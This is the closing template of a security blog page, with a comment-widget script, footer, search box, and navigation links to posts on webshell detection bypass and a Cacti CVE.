var flag = false;
var gitFun = function () {
    try {
        var valineObj = window.GLOBAL_CONFIG.valine;
        new Valine({
            el: "#comments-container",
            ...valineObj
        });
        flag = true;
    } catch (e) {
        flag = false;
    }
}
var setIn = setInterval(() => {
    if (!flag) {
        gitFun();
    } else {
        clearInterval(setIn);
    }
}, 200);</script></div></article><div id="pagination"><div class="prev-post pull-left"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2025/07/30/HIDS-PHP-Webshell-Bypass-%E7%A0%94%E7%A9%B6%E5%88%86%E6%9E%90/"><i class="fas fa-angle-left">&nbsp;</i><span>HIDS PHP Webshell Bypass 研究分析</span></a></div><div class="next-post pull-right"><span class="line line-top"></span><span class="line line-right"></span><span class="line line-bottom"></span><span class="line line-left"></span><a href="/2025/07/25/cacti-CVE-2022-46169/"><span>cacti CVE-2022-46169</span><span>&nbsp;</span><i class="fas fa-angle-right"></i></a></div></div><!--div!= paginator()--></div></div><div class="button-hover" id="return-top"><i class="fas fa-arrow-up" aria-hidden="true"></i></div><footer><div id="footer"><div class="button-hover" id="side-button"><i class="fas fa-arrow-right"></i></div><div class="right-content"><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fas fa-file-o"></i></span><span id="busuanzi_value_page_pv"></span><span></span></div><div class="copyright">&copy;2025 By JGwebre</div></div></div></footer></div><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery-3.3.1.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/velocity.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/thirdparty/jquery.mCustomScrollbar.concat.min.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/fan.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/canvas_bg.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/utils.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/scroll.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/sidebar.js"></script><!--script(src=url)--><!--js(src=url_for(url) + '?version=' + version())--><script src="/js/copy.js"></script><!--script(src=url)--><div class="search-dialog"><div id="algolia-search-title">Algolia</div><div class="search-close-button"><i class="fa fa-times"></i></div><!--div#current-refined-values--><!--div#clear-all--><div id="search-box"></div><!--div#refinement-list--><hr><div id="hits"></div><div id="algolia-pagination"></div></div><div class="search-mask"></div><script src="/js/search/algolia.js"></script></body></html>